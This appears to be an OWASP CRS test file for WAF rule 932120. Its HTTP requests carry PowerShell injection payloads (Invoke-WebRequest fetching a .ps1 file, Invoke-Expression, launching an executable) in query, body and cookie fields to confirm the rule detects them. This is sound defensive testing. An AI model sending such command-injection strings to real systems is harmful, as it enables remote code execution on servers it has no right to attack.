---
meta:
  author: "Paul Beckett, azurit"
rule_id: 932120
tests:
  - test_id: 1
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932120]
  - test_id: 2
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "POST"
          port: 80
          uri: "/post"
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1'
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932120]
  - test_id: 3
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932120]
  - test_id: 4
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "POST"
          port: 80
          uri: "/post"
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          data: '932120-4=Invoke Web Request http://example.com/path/file.ps1'
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [932120]
  - test_id: 5
    desc: "Test for BB GU2FIXLC - powershell"
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "POST"
          port: 80
          uri: "/post"
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe'
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932120]
